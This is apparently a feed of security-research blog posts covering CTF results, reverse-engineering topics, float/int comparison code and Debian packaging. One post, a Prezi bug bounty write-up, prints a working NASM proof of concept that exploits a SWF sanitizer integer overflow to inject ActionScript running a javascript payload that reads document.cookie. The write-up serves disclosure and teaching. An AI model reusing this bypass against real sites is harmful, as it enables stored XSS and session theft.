Insomni’hack 2015, presentation slide deck and CTF results

By j00ru | Tue, 24 Mar 2015 18:48:28 +0000 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz “j00ru” Jurczyk) Just three days ago another edition of the great Insomni’hack conference held in Geneva came to an end. While the event was quite short, lasting for just one day, it featured three tracks of security talks, including some very interesting ones such as Automotive security by […]

Insomni'hack 2015, presentation slide deck and CTF results

By Gynvael Coldwind | Tue, 24 Mar 2015 00:09:21 +0100 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz “j00ru” Jurczyk)
Just three days ago another edition of the great Insomni'hack conference held in Geneva came to an end. While the event was quite short, lasting for just one day, it featured three tracks of security talks, including some very interesting ones such as Automotive security by Chris Valasek, or Copy & Pest – A case-study on the clipboard, blind trust and invisible cross-application XSS by Mario Heiderich. This year we were also invited to the conference to talk about CTF techniques, experiences and entertaining tasks encountered by the Dragon Sector team we lead and actively play in. We thus gave a presentation called Pwning (sometimes) with style – Dragons’ notes on CTFs, and are now making the slide deck publicly available for your enjoyment:

Pwning (sometimes) with style – Dragons’ notes on CTFs (3.86MB, PDF)

While the conference was very well organized and had many interesting talks, the main event of the evening was only about to start at 18:00: the CTF competition organized by the Insomni'hack crew, which attracted hundreds of players from all around the world, including many top teams from the CTF scene (e.g. StratumAuhuur, int3pids, dcua, penthackon, 0x8F). Since we really liked the finals from last year, Dragon Sector also came back in a large squad of 9 players; one of whom played in a different team due to a strict 8-person limit. We did our best to defend last year's title (top 1) and eventually succeeded, but it was not an easy task for sure. The most intense moment was when the StratumAuhuur team submitted a flag 4 minutes before the end of the CTF (at 3:56:23 AM), closing our point advantage to only ~20 points, which was so close that it could have easily changed in favor of Stratum regardless of our actions (due to this year's variable nature of tasks scoring, which accounted for the total number of teams solving each challenge). Fortunately, Gynvael and I were on a verge of solving another networking task at the time and barely managed to get it a little more than a minute before the end of the competition, consequently securing a win. The situation is well illustrated in the photo of the final ranking below.

The organizers, SCRT, have also published their own summary of the CTF with a full ranking and some interesting stats: Insomni’hack finals – CTF results.

How to automatically extract all raw bitmaps from a memory dump?

By Gynvael Coldwind | Fri, 27 Feb 2015 00:09:19 +0100 | @domain:
That's actually a real question with no solution (though some links) posted in this blog post. And the keyword here is "automatically" ;>

Let's starts by me making sure that the problem is stated clearly: we assume, that we have a large memory blob (anything between 500 MB to 1 TB) and we want to find all raw bitmaps and their width in it. Furthermore, since this is kinda ambiguous, by "raw bitmaps" I mean neither camera RAW formats used in digital photography (NEF, ORF, CR2 and the like) nor "image files" (like PNG, BMP, JPG, GIF, TIFF and the like) - how to find most of these things is of course common knowledge that can be summarized by "find magic or pattern that's commonly at the beginning". This approach has been used by many old school ripper programs like Multi Ripper (seen around in late '90, though I remember such apps from at least a few years earlier) or other similar though older apps, as well as newer stuff like binwalk or PhotoRec. What we're looking for is just plain bitmap data (8/24/32 bpp for starters) without any magic values, headers, compression or other strange encodings.

Where would this be useful? In analyzing various memory dumps or disk dumps where you can't make any smart calls about kernel/FS/heap/app memory structures or if parts of said are missing/have been wiped (so volatility/Slueth Kit are useless).

Usually the way I did this (and still do) was to open the file in IrfanView as .raw, set width to something around 1024, height to a large value, offset to whatever part I was analyzing and then I scrolled through the huge bitmap counting on my brain to spot any patterns. I'm not going to describe the exact details of this method, since Bernardo beat me to it and I have really nothing to add (though his GIMP method seems more friendly as you have a scroll bar to set the width which looks waaay better than putting the number manually in IrfanView). The thing I found surprising about his post is that the CTF task he gives as an example - coor coor from 9447 - is the exact task I had in mind when spawning the discussion with Ange (which later moved to twitter and made Bernardo write his post). Here are three of my findings from that task:

The discussion at twitter included several interesting links/ideas:
- @doegox pointed to his tool
- @jchillerup pointed to the cantor dust talk/tool which doesn't solve the problem, but is (i.e. looks like) probably the best non-automatic tool for this purpose; some patterns remind me of one of my previous blog posts, which spawns an idea I guess on how to find candidate bitmaps in the binary blob.
- @scanlime pointed to the autocorrelation problem, which names the problem I was thinking about and points to the solution
- @hanno pointed to JPEG compression tested on various widths/offsets, which would be another idea to find candidate bitmaps
- @sqaxomonophonen pointed to FFT and looking for spikes, which would be a way to determine the width
- @CrazyLogLad suggested something similar
- @aeliasen said this:

I'd calculate the autocorrelation of the bytes; period with strongest autocorr. should give width. You might have to throw out small periods (like 1-3) and divide by pixel depth.
Seems I need to do some reading on autocorrelation/FFT to move this forward.

If someone would like to try his luck with any of the two problems ([1] finding bitmap candidates in a LARGE binary blob and [2] automatically determining width of the candidate), the coor coor dump is here (link shamelessly taken from Bernardo's blog):

If you have any other ideas, comments or links, feel free to add them in the comment section.


Ubuntu proposed migration. update_output.txt

By sil2100 | Mon, 02 Feb 2015 11:47:00 GMT | @domain:
Those of you that know a thing or two about the Ubuntu archives also most probably know about the proposed pocket for every distribution series. In a quick overview, every upload made to the main archives first goes to -proposed and then migrates (in case of the development series) to the release pocket once the so called proposed migration is happy with it. Most of the time it just migrates fine on its own, but sometimes a package can fail to "move on". And this is where update_excuses.html and update_output.txt come in handy.

SECURE 2014 slide deck and Hex-Rays IDA Pro advisories published

By j00ru | Thu, 23 Oct 2014 12:32:55 +0000 | @domain:
Yesterday I gave a talk at a Polish security conference held in Warsaw, Poland, called “Ucieczka z Matrixa: (nie)bezpieczna analiza malware” (eng. “Escaping the Matrix: (in)secure malware analysis”). The presentation was lightly technical and concerned the different threats of using popular software to aid in interacting with and analyzing malware samples. While the talk was […]

CONFidence 2014 video from our talk on CTFs

By Gynvael Coldwind | Sat, 19 Jul 2014 00:09:01 +0200 | @domain:
Just a quick note: the video from j00ru's and my talk from this year's CONFidence edition is now online. As mentioned in the previous post on the topic, the talk was called "On the battlefield with the Dragons" and consisted of a selection of interesting CTF task solutions with some useful tips and trick near the end.

Links: video, slides.

Let us know what you think!

Slides from Ange's and my talk about Schizophrenic files, Area41

By Gynvael Coldwind | Tue, 03 Jun 2014 00:08:59 +0200 | @domain:
Yesterday I had the pleasure to co-present with Ange Albertini (@angealbertini) - if you are into binary stuff, you probably know his website - corkami, which has all sorts of cool stuff, from posters detailing binary format (e.g PE 101) to binary polyglots, etc. We talked about "schizophrenic files", i.e. various file formats which get interpreted differently depending on what program you use (e.g. a BMP image which, when viewed in one viewer, shows a cat but when using a different one shows a flying shark). Basically the story goes that we both did (separately) some more or less random digging on (or more accurately in my case: randomly stumbling on) behaviors which allow one to create a file which is open to creative interpretation by the software, or (more commonly) parser authors just decide to not follow the specs or understand them in a different way; we decided to gather all this in one place and hence the talk. We presented it at Area41 in Zurich (which btw turned out to be really well organized and awesome conference). Slides and PoCs are available below.

Slides: Schizophrenic files (Ange Albertini, Gynvael Coldwind)
PoCs: Schizophrens (PoC) ("All" contains all the files from the directories)

As usual, feedback is most welcome!


CONFidence 2014 slides from Dragon Sector are now available

By j00ru | Thu, 29 May 2014 10:07:24 +0000 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz “j00ru” Jurczyk) Just yesterday another edition of the largest and most successful IT security conference held in Poland – CONFidence – ended. The Dragon Sector CTF team (which we founded and are running) actively participated in the organization of the event by hosting an onsite, individual CTF for […]

CONFidence 2014 slides from Dragon Sector are now available

By Gynvael Coldwind | Thu, 29 May 2014 00:08:57 +0200 | @domain:
(Collaborative post by Gynvael Coldwind and Mateusz "j00ru" Jurczyk)

Just yesterday another edition of the largest and most successful IT security conference held in Poland - CONFidence - ended. The Dragon Sector CTF team (which we founded and are running) actively participated in the organization of the event by hosting an onsite, individual CTF for the conference attendees and giving a talk about the most interesting challenges we have solved so far in our not too long CTF career.

The final standings of the CONFidence 2014 CTF can be found below. We will also publish a more detailed summary, together with some or all of the challenges, on our official Dragon Sector blog within a few days.

1. liub, 2. dcua, 3. 4c...fd sector

The slide deck from our presentation can be found below:
On the battlefield with the Dragons - the interesting and surprising CTF challenges (3.93MB, PDF)


A case of a curious LibTIFF 4.0.3 + zlib 1.2.8 memory disclosure

By j00ru | Wed, 30 Apr 2014 14:23:21 +0000 | @domain:
As part of my daily routine, I tend to fuzz different popular open-source projects (such as FFmpeg, Libav or FreeType2) under numerous memory safety instrumentation tools developed at Google, such as AddressSanitizer, MemorySanitizer or ThreadSanitizer. Every now and then, I encounter an interesting report and spend the afternoon diving into the internals of a specific […]

The perfect int == float comparison

By Gynvael Coldwind | Sun, 27 Apr 2014 00:08:55 +0200 | @domain:
Just to be clear, this post is not going to be about the float vs. float comparison. Instead, it will be about trying to compare a floating point value with an integer value in an accurate, precise way. It will also be about why just doing int_value == float_value in some languages (C, C++, PHP, and some other) doesn't give you the result you would expect - a problem which I recently stumbled on when trying to fix a certain library I was using.

UPDATE: Just to make sure we see it in the same way: this post is about playing with bits and floats just for the sake of playing with bits and floats; it's not something you could or should use in anything serious though :)

UPDATE 2: There were two undefined behaviours pointed out in my code (one, two) - these are now fixed.

The problem explained

Let's start by demonstrating a the problem by running the following code that compares subsequent integers with a floating point value:

float a = 100000000.0f;
printf("...99 --> %i\n", a == 99999999);
printf("...00 --> %i\n", a == 100000000);
printf("...01 --> %i\n", a == 100000001);
printf("...02 --> %i\n", a == 100000002);
printf("...03 --> %i\n", a == 100000003);
printf("...04 --> %i\n", a == 100000004);
printf("...05 --> %i\n", a == 100000005);

The result:

...99 --> 1
...00 --> 1
...01 --> 1
...02 --> 1
...03 --> 1
...04 --> 1
...05 --> 0

Sadly this was to be expected in the floating point realm. However, while in this world both 99999999 and 100000004 might be equal to 100000000, this is sooo not true for common sense nor standard arithmetic.

Let's look at another example - an attempt to sort a collection of numbers by value in PHP:

$x = array(

foreach ($x as $i) {
if (is_float($i)) {
printf("%.0f\n", $i);
} else {
printf("%i\n", $i);

The "sorted" result (64-bit PHP):

> php test.php

Side note: The code above must be executed using 64-bit PHP. The 32-bit PHP has integers limited to 32-bit, so the numbers I used in the example would exceed their limit and would get silently converted to doubles. This results in the following output:


So, what's going on?

It all boils down to floats having to little precision for larger integers (this is a good time to look at this and this). For example, the 32-bit float has only 23 bits dedicated to the significand - this means that if an integer value that is getting converted to float needs more than 24 bits (sic!; keep in mind that in floats there is a hardcoded "1" at the top position, which is not present in the bit-level representation) to be represented, it will get truncated - i.e. the least significant bits will be treated as zeroes.

In the C-code case above the decimal value 100000001 actually requires 27 bits to be properly represented:


However, since only the leading "1" and following 23-bits will fit inside a float, the "1" at the very end gets truncated. Therefore, this number actually becomes another number:


Which in decimal is 100000000 and therefore is equal to the float constant of 100000000.0f.

Same problem exists between 64-bit integers and 64-bit doubles - the latter have only 52 bits dedicated for storing the value.

A somewhat amusing side note

Actually, it gets even better. Let's re-write the first code shown above (the C one) to use a loop:

float a = 100000000.0f;
int i;
for(i = 100000000 - 5; i <= 100000000 + 5; i++) {
printf("%11.1f == %9u --> %i\n", a, i, a == i);

As you can see, there are no big changes. Now let's compile it and run it:

>gcc test.c
> a
100000000.0 == 99999995 --> 0
100000000.0 == 99999996 --> 0
100000000.0 == 99999997 --> 0
100000000.0 == 99999998 --> 0
100000000.0 == 99999999 --> 0
100000000.0 == 100000000 --> 1
100000000.0 == 100000001 --> 0
100000000.0 == 100000002 --> 0
100000000.0 == 100000003 --> 0
100000000.0 == 100000004 --> 0
100000000.0 == 100000005 --> 0

The result is magically correct! How about we compile it with optimization then?

>gcc test.c -O3
> a
100000000.0 == 99999995 --> 0
100000000.0 == 99999996 --> 1
100000000.0 == 99999997 --> 1
100000000.0 == 99999998 --> 1
100000000.0 == 99999999 --> 1
100000000.0 == 100000000 --> 1
100000000.0 == 100000001 --> 1
100000000.0 == 100000002 --> 1
100000000.0 == 100000003 --> 1
100000000.0 == 100000004 --> 1
100000000.0 == 100000005 --> 0

Why is that? Well, in both cases the compiler needs to convert the integer to a float and then compare it with the second float value. This however can be done in two different ways:

Option 1: The integer is converted to a floating point value, then is stored in memory as a 32-bit float and then loaded into the FPU for the comparison OR (in case of constants) the integer constant can be converted to a 32-bit float constant at compilation time and then it will be loaded into the FPU for comparison at runtime.
Option 2: The integer is directly loaded into the FPU for comparison (using fild FPU instruction or similar).

The difference here is related to the FPU internally operating on larger floating point values with more precision (by default it's 80-bits, though you can change this) - so the 32-bit integer isn't truncated on load, as it would happen if it gets converted explicitly to a 32-bit float (which, again, has only 24-bits for the actual value).

Which option is selected depends strictly on the compiler - it's mood, version, options used at compilation, etc.

The perfect comparison

Of course, it's possible to do a perfect comparison.

The simplest and most straightforward way is to cast both the int value and the float value to a double before comparing them - double has large enough significand to store all possible 32-bit int values. And for the 64-bit integers you can use the 80-bit long double which has exactly 64 bits dedicated for storing the value (plus the ever-present "1").

But that's too easy. Let's try to do the actual comparison without converting to larger types.

This can be done in two ways: the "mathematical" way (or: value-specific way) and the encoding-specific way. Both are presented below.

UPDATE 3: Actually there seems to be another way, as pointed out in the comments below and in this reddit post. It does make sense, but I still wonder if there is any counterexample (please note that I'm not saying there is; I'm just saying it never hurts to look for one ;>).

The mathematical way

We basically do it the other way around - i.e. we try to convert the float to an integer. There are a couple of problems here which we need to deal with:

1. The float value might be bigger than INT_MAX or smaller than INT_MIN. In such case this might happen and we wouldn't be able to catch it after the conversion, so we need to deal with it sooner.

2. The float value might have a non-zero fractional part. This would get truncated when converted to an int (e.g. (int)1.1f is equal to 1) - we don't want this to happen either.

The implementation of this method (with some comments) is presented below:

bool IntFloatCompare(int i, float f) {
// Simple case.
if ((float)i != f)
return false;

// Note: The constant used here CAN be represented as a float. Normally
// you would want to use INT_MAX here instead, but that value
// *cannot* be represented as a float.
const float TooBigForInt = (float)0x80000000u;

if (f >= TooBigForInt) {
return false;

if (f < -TooBigForInt) {
return false;

float ft = truncf(f);
if (ft != f) {
// Not an integer.
return false;

// It should be safe to cast float to integer now.
int fi = (int)f;
return fi == i;

The encoding-specific way

This method relies on decoding the float value from the bit-level representation, checking if it's an integer, checking if it is in range and finally comparing the bits with the integer value. I'll just leave you with the code. If in doubt - refer to this wikipedia page.

bool IntFloatCompareBinary(int i, float f) {
uint32_t fu32;
memcpy(&fu32, &f, 4);

uint32_t sign = fu32 >> 31;
uint32_t exp = (fu32 >>23) & 0xff;
uint32_t frac = fu32 & 0x7fffff;

// NaN? Inf?
if (exp == 0xff) {
return false;

// Subnormal representation?
if (exp == 0) {
// Check if fraction is 0. If so, it's true if "i" is 0 as well.
// Otherwise it's false in all cases.
return (frac == 0 && i == 0);

int exp_decoded = (int)exp - 127;

// If exponent is negative, the number has a fraction part, which means it's not equal.
if (exp_decoded < 0) {
return false;

// If exponenta is above or equal to 31, int cannot represent so big numbers.
if (exp_decoded > 31) {
return false;

// There is one case where exp_decoded equal to 31 makes sens - when float is
// equal to INT_MIN, i.e. sign is - and fraction part is 0.
if (exp_decoded == 31 && (sign != 1 || frac != 0)) {
return false;

// What is left is in range of integer, but still can have a fraction part.

// Check if any fraction part will be left.
uint32_t value_frac = (frac << exp_decoded) & 0x7fffff;

if (value_frac != 0) {
return false;

// Check the value.
int value = (1 << 23) | frac;
int shift_diff = exp_decoded - 23;
if (shift_diff <0) {
value >>= -shift_diff;
} else {
value <<= shift_diff;

if (sign) {
value = -value;

return i == value;


The above functions can be used for a perfect comparison and they SeemToWork™ (at least on little endian x86). With some more work both functions could be converted to be perfect "less than" comparators which then could be used to fix the PHP sorting example.

But... seriously, just cast the integer and float to something that has more precision ;>

P.S. Did you know that there are exactly 75'497'471 positive integer values that can be precisely represented as a float? Not a lot for the total of 2'147'483'647 positive integers.

Integer overflow into XSS and other fun stuff - a case study of a bug bounty

By Gynvael Coldwind | Thu, 27 Mar 2014 00:08:53 +0100 | @domain:
Some time ago I decided to spend a few evenings playing with bug bounties. I've looked around and finally decided to focus on Prezi, since, being a user of their product, I was already somewhat familiar with it. As I seem to be naturally drawn to low-level areas, this quickly turned into an ActionScript reverse-engineering exercise with digging into the internals of SWF file format. I found a couple of interesting and fun bugs (e.g. an integer overflow that led to ActionScript code execution - you don't commonly see these this far from the C/C++ kingdom), and a few of them are worth sharing in my opinion.

At the bottom of the post I've put some information about the tools I've used, just in case you're curious.

Random announcement not really having anything to do with the post: Dragon Sector is looking for sponsors that would help us play at DEF CON CTF. Thank you. Now back to our show!

What is Prezi?

Before I get to the juicy part, let's do a really quick intro to get everyone into context: Prezi ( is basically a huge Flash application that allows you to make cool-looking animated presentations in a really easy way. They provide both online service and storage, and a desktop version which basically is just a standalone Flash application; I focused only on the online application and the surrounding web service.

As far as Prezi Bug Bounty Program goes, you can read all about it at I'll just add that everything (communication, fixing bugs, etc) went smoothly and that Prezi has a really friendly security team :)

Bug 1: SWF sanitization incomplete blacklist into AS code execution (XSS)

One of Prezi's features is embedding user-provided Flash applets into the presentation. Of course, before the SWF is embedded, it's scrubbed for any parts that contain ActionScript or import other SWF files - this is done to prevent executing user's (attacker's) code. As soon as the SWF is clean, it gets loaded into the Prezi's context.

The SWF (under the optional DEFLATE compression layer) is basically a chunk based format. Each chunk starts with a header (and the data follows), that looks like this:

Short chunk: [ data size (6 bits) ][ tag ID (10 bits) ]
Long chunk: [ 0x3f ][ tag ID (10 bits) ][ data size (32 bits) ]

Both the formats of the chunks and the tag IDs are defined in "SWF File Format Specification" released by Adobe. As of today the current version is 19 updated April 23, 2013, and as to be expected, it has "only" 243 pages. There are currently 94 tag IDs defined (from 0 to 93, with a couple missing, e.g. ID 92 or ID 79-81), with some of them being just iterations of a given chunk type (e.g. ID 2 - DefineShape, ID 22 - DefineShape2, ID 32 - DefineShape3 and ID 83 - DefineShape4).

As mentioned, the scrubbing basically went after the chunks which might lead to code execution - if such chunk was found, it was removed from the SWF.

There are basically three groups of chunks that may result in code execution:
  1. Chunks which just execute code, e.g. ID 59 - DoInitAction or ID 12 - DoAction.
  2. Chunks which import resources (chunks) from other SWF files, e.g. ID 57 - ImportAssets or the second version of this chunk with ID 71.
  3. Chunks representing graphical objects which may have some actions defined - e.g. ID 7 DefineButton, which can perform actions (i.e. run ActionScript) when e.g. it's clicked.
As one can imagine, Prezi did contain three functions responsible for recognizing these groups:

private static function isTagTypeCode(param1:uint) : Boolean
return param1 == 12 || param1 == 59 || param1 == 76 || param1 == 82;
}// end function

private static function isTagTypeImports(param1:uint) : Boolean
return param1 == 57 || param1 == 71;
}// end function

private static function isTagTypeContainsActions(param1:uint) : Boolean
return param1 == 7 || param1 == 26 || param1 == 34 || param1 == 39 || param1 == 70;
}// end function

Here's the catch: isTagTypeContainsActions was never called. So basically embedding a Flash file with e.g. a button that had actions defined (e.g. the "on mouse over" action) led to arbitrary ActionScript code execution in the context of Prezi, which is basically an XSS (and a stored/wormable at that).

The tricky part with the fix here is that ideally you don't want to remove graphical elements from the SWF, so removing whole chunks in this case is an overkill. What you want to do is to remove the actions alone and that requires more code and digging deeper into the format, making the simple solution more complex.

On a more general note: using blacklist is usually a bad idea; for example, a new SWF File Format Specification comes out with Tag ID 95 defined as DoInitAction2 and you have to update the application. You miss a beat and you have an XSS again. A cleaner solution here would be to have a whitelist of allowed tags and just remove everything else.

Bug 2: Integer overflow in AS into XSS

Digging deeper into the chunk removing code I notice the following code:

private static function skipTag(param1:ByteArray) : void
var _loc_2:* = getTagLengthAndSkipHeader(param1);
param1.position = param1.position + _loc_2;
}// end function

The red line retrieves an attacker-controlled chunk length from the SWF file - as noted in the previous bug, for long chunks this can be a a 32-bit value, and the returned type is uint.

The yellow line does basically an addition assignment to basically skip past the chunk-that-is-OK in the data stream. The param1.position is also uint according to AS documentation.

You know here this is going :)

In ActionScript uint is a 32-bit unsigned value with modulo arithmetic, so the result of the above addition is also truncated to 32-bit, regardless of its true value. So yes, it's an integer overflow. And it allowed one to bypass the SWF sanitizer.

Exploiting this turned out to be quite interesting and included a small twist which made things even more entertaining.

Starting with the basic idea, here is how the sanitizer worked from a high level perspective (in pseudocode; I'll omit code added after patching previous bug, since it changes nothing):

SWF = decompress(SWF)
SWF.position ← 0
SWF.headers.fileLength ← SWF.length
skip SWF headers
while SWF.bytesAvailable > 0 {
if Tag at SWF.position is in blacklist {

The skipTag was already shown above, so that leaves just the eraseTag method:

old_position ← SWF.position
temp_buffer ← new ByteArray()
SWF.position ← old_position
SWF.length ← old_position + temp_buffer.length
SWF.position ← old_position

So eraseTag basically copies whatever is past the tag-to-be-removed on top of that tag and fixes the total data size (SWF.length) afterwards.

The above allows us to basically jump backwards into a middle of a chunk (that's the consequence of the integer overflow) and remove however many bytes we like. This of course leads to changing how the Adobe Flash SWF interpreter will see the file, which is different than how the sanitizer originally saw it.

Let's look at an example:

So basically this is what's happening here (in chronological order):
  • The sanitizer reaches the overflowing tag and jumps backward into the first shown tag's data.
  • The data contains a valid chunk header, which described a tag which is on the blacklist. This chunk gets removed.
  • The next tag (which originally was just second chunk's data) has a huge length which sends the sanitizer to EOF and so the sanitizer exits.
  • When the Adobe Flash SWF parsers sees the output, it sees the "send to EOF" chunk, the overflowing chunk and the padding just as the first tags data, and ignores is (ShowFrame has no meaningful data from SWF parsers perspective).
  • And it reaches the hidden "evil" tags which contain ActionScript to execute. The sanitizer never had a chance to see and sanitize these tags, since it was sent backwards and then to EOF.
Now, here's the catch: Prezi's sanitizing code has a bug which triggers a quirky behavior in Adobe Flash, which prevents execution of any ActionScript.

Remember these lines?

SWF = decompress(SWF)
SWF.headers.fileLength ← SWF.length

This fixes the SWF length after decompression. However, the file length in the SWF headers should also be fixed if any chunk gets removed and it's not. For some reason incorrect size causes Flash to ignore any ActionScript (I never got into the bottom of why exactly is this happening though; though it acted very peculiarly).

So, to exploit this I needed to make the sanitizer fix the headers for me. This turned out to be both simple and a little more tricky. Simple, because the overflow allowed me to send the sanitizer back as far as I wanted - e.g. to the beginning of the SWF headers. And more tricky, because the DWORD representing the file size is just after the SWF magic and version, so that means I had to make the file size be at the same time a valid chunk header for a blacklisted chunk (but that turned out to not be a problem).

The final setup looked like this (in the data of the hidden junks the sanitizer was sent to EOF of course):

The NASM code (it's the way I prefer to generate simple binary files - don't worry, it's "Ange Approved" ;>) to generate a PoC according to the above schema looks like this:

[bits 32]
org 0

; SWF file

; ----------------------- HEADERS
db "FWS"
db 6 ; version 6

dd end_of_file ; size of data

db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1 ; 1 Frame

; ----------------------- TAGS
%macro TAG_SHORT 2
dw (%2 | %1 <<6)

%macro TAG_LONG 2
dw (0x3f | %1 << 6)
dd .end - ($ + 4)

dw (0x3f | %1 << 6)
dd %2

%define TAG_End 0
%define TAG_ShowFrame 1
%define TAG_DefineShape 2
%define TAG_SetBackgroundColor 9
%define TAG_PlaceObject2 26
%define TAG_DoAction 12

; Start of tags.

; Trigger the integer overflow to go back to the size of data field
TAG_LONG_MANUAL TAG_ShowFrame, -(($ - size_of_data_header) + 4)
times 41 db 0xaa

; Data continues here.
; Or actually it's the headers we need to rebuild.

dd 766 ; New file size. It's equal to tag 11, size 62
db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1 ; 1 Frame

; There are 47 bytes left here before that crazy thing returns.
; times 47 db 0xaa
TAG_LONG TAG_DoAction, MyAction1
db 0x83
dw .StringsEnd1 - ($ + 2) ; Size
db "javascript:prompt(document.domain,"
; Fun fact - in 4 bytes the crazy thing returns.
db '" '
; It's here. Well, send it back to the void or something.
db 0x3f ; Long tag size. (it's actually '?')
db ':' ; Tag ID. Whatever.
db ' ' ; 0x20202020 - this should be enough to get rid of it for good.
db '" + ' ; And were done here.
; Let's continue were we left, shall we?
db "document.cookie);", 0
db "", 0 ; _blank
.ActionsEnd: db 0 ; EndOfAction Flag

TAG_SHORT TAG_ShowFrame, 0

; End.
; 12 << 6 == 768
; + 0x3e == 830
times (((12 << 6) | 0x3e) - ($-start)) db 0xcc

Of course ideally you wouldn't redirect the sanitizer into the middle of your AS/JS payload, but it's just a PoC, so no sense thinking too much about it I guess; especially that it worked:

Again, I would classify this as a stored/wormable XSS.

Bug 3 (unexploitable): Abusing the AES-128-CBC IV

Let's document some failures as well :)

This bug did exist (so it wasn't a false-positive), but it turned out to be non-exploitable due to how bloated the SWF headers are. Still, it's a pretty fun example of what you can attempt to do with crypto in certain, very specific, scenarios.

Let's start by discussing how Prezi is (was) loaded (I'll simplify it a little to focus on the important part):
  1. The website actually embeds a loader (called preziloader-*.swf).
  2. The loader fetches a 128-bit AES key and a 128-bit AES IV key from /api/embed (yes, it's a relative path).
  3. The loader loads into a ByteArray the main module: main-*.swf from * (the domain is verified).
  4. The first 2064 bytes of the main SWF file are decrypted using AES-128-CBC, using the retrieved keys. The rest of the bytes are already plain-text.
  5. The main SWF is loaded into the same security context.
This means that:
  • We don't control main-*.swf at all.
  • But we do control both AES key and IV.
And, whoever controls the AES-128-CBC IV, fully controls the first 16 bytes of the decrypted main-*.swf.

This is because AES in CBC mode works like this:
  1. Take the next 16-byte block.
  2. Decrypt the block using AES KEY and AES algorithm.
  3. XOR the result with the 16-byte IV and that's the decrypted block.
  4. GOTO 1 until end of data.
So basically:
  1. The we know the result of the decryption of the first block (we can just grab main-*.swf and decrypt it using either their AES key or a different key that will give "wrong" data, that doesn't really matter).
  2. And we can choose what to XOR it with (IV).
So, basically, we choose the result of the decryption of the first block* (and get trashed data in all the other blocks).
* - actually, if we think of the data as 16-byte rows, then we control one byte in each column, in a row of our choice; all bytes don't have to be in the same row.

There are a couple of important things to note:
  • The IV gives us only 16-bytes to control.
  • Doing some AES key brute forcing it might be possible to control additionally 2-5 bytes - however the time to get the additional bytes grows exponentially - it's 256**N operations (AES decryptions) basically, where N is the number of additional bytes we would like to control. This is also tricky for another reason (it will create additional constraints for byte values due to the IV changes we will have to make).
  • Prezi actually uses AES-128-CBC with PKCS#5, so padding bytes have to have the value of padding length (e.g. 5-byte padding has to look like this: 05 05 05 05 05). And remember: if we choose a different key/IV, the original padding will be destroy. This can be bypassed by choosing such an IV, that the last byte in the last block is 0x00 or 0x01 (then the padding is not checked because it's assumed that there is no padding at all, or it's a one-byte padding only). So this is not a huge problem.
  • If we choose the ZWS format for the SWF file, Prezi loader is nice enough to fix the magic and file size in the SWF header, so that's 7 bytes we wouldn't have to worry about. But there is an additional LZMA header which we would have to start worrying about, so it gives us nothing.
  • Probably some of the bytes in the SWF header can have a broken value and the SWF will still work. So we don't have to worry about these bytes.
To sum up: we would control about 18-21 bytes, wouldn't have to worry about a few more and everything else would be "random bytes" (the result of decrypting data with wrong key and IV).

Sadly/thankfully (depending on the perspective) in the end this is not exploitable with SWFs, because one would need to control about 50 bytes of SWF to make a valid file that has some meaningful code which gives you code execution. So... close, but no cigar :)

Tools used

In no particular order:
  • Sothink SWF Decompiler - Pretty fast and accurate tool. Had minor problems with a function or two, but that's still really good. You can re-compile the code it generates without any changes at all (very useful for testing).
  • JPEXS Free Flash Decompiler (aka FFDec) - A free and opensource SWF decompiler. Takes its time when decompiling, but sometimes does a better job than Sothink. It can also extract SWF files from process' (think: browser's) memory - this proved useful. I didn't try to re-compile the code it generates.
  • Netwide Assembler (aka NASM) - An x86 assembler which I commonly misuse to assemble non-complex binary files.
  • Adobe Flex - Your basic ActionScript compiler.
  • Python - For additional scripts and mini-tools.
  • Firefox + Fiddler - HTTP communication monitoring.

And that's about it. Let me know if you have any questions or if I got something wrong.

Video recording of my Data, data, data! reverse-engineering webinar

By Gynvael Coldwind | Wed, 19 Mar 2014 00:08:51 +0100 | @domain:
As you probably know, we've run into some serious technical problems during the webinar (who would suspect a hangouts outage, huh), which caused both a 40 minute delay, changing the platform and some minor problems on the line (like lack of recording). So, as promised, I did record the talk again and I've just posted it on YouTube, to be enjoyed by everyone who couldn't see the live one, or decided to wait for the video for other reasons (the technical problems being a good one).

Context: please refer to this post.

"Data, data, data! I can't make bricks without clay." A few practical notes on reverse-engineering.

Direct YouTube link: click

The talk was done as part of Garage4Hackers Ranchoddas Series.

Slides: here
Scripts, etc: here

Once again sorry for the technical issues during the live talk.
Let me know what you think about the talk (questions are welcome as well) :)


C++ symbols in debian/symbols files - symbol export maps

By sil2100 | Mon, 17 Mar 2014 20:04:00 GMT | @domain:
When developing a C++ library that we later intend to provide by means of a Debian package, there are certain things that make it really complicated and hard to maintain. Everyone that had to deal with debian/symbols in a C++ library knows how troublesome it is. The biggest problem besides name mangling: symbols leakage. By default the GNU ELF linker exports everything as it goes, leading to maintenance hell. Sadly, this has to be dealt with on the source level - the best way? Symbol export maps.

A free webinar on Reverse Engineering

By Gynvael Coldwind | Tue, 11 Mar 2014 00:08:48 +0100 | @domain:
Next week I will be doing a free webinar on Reverse Engineering - "Data, data, data! I can't make bricks without clay."*. I will focus on practical RE tips and tricks I'm using day-to-day, which generally speed up the whole process or are simply cool (imo). The webinar will be hosted by Garage4Hackers as part of the Ranchoddas Series; see the details below.

Title: "Data, data, data! I can't make bricks without clay."* Few practical notes on reverse-engineering.
* Sir Arthur Conan Doyle, The Adventure of the Copper Beeches (one of the Sherlock Holmes short stories)

Date: 17 March 2014
Time (Switzerland/EU aka UTC+01:00 aka CET aka GMT +1:00): 18:00
Time (IST aka GMT +5:30): 22:30
Time (other places):
Duration: TBD, but something between 45-60 minutes + time for questions

Video stream: or
Questions / chat: #g4h @ (or via web:

Registration link: click
(We will be sending out the video link via e-mail, once we have it - probably just before the webinar; we'll also post that link on G4H forum/facebook/twitter + probably around here.)

The presentation will be focused on various practical tips and tricks that can speed up the process of reverse-engineering. The presented information will not be strictly tied to any specific platform or tool - most of it can be applied on any architecture or operating system.

Examples of topics:
- how to start with an unknown architecture
- debugger scripting
- creating your own useful tools
- etc

- some reverse-engineering experience or general interest in reverse-engineering
- basic programming skills
- basic knowledge of how the CPU and operating systems work

garage4hackers ranchoddas sersier poster

Big thanks to Garage4Hackers Team for organizing this!

Let me know if you are planning to attend and see you there :)

My first ever podcast in English - solving Binathlon 400 CTF crackme

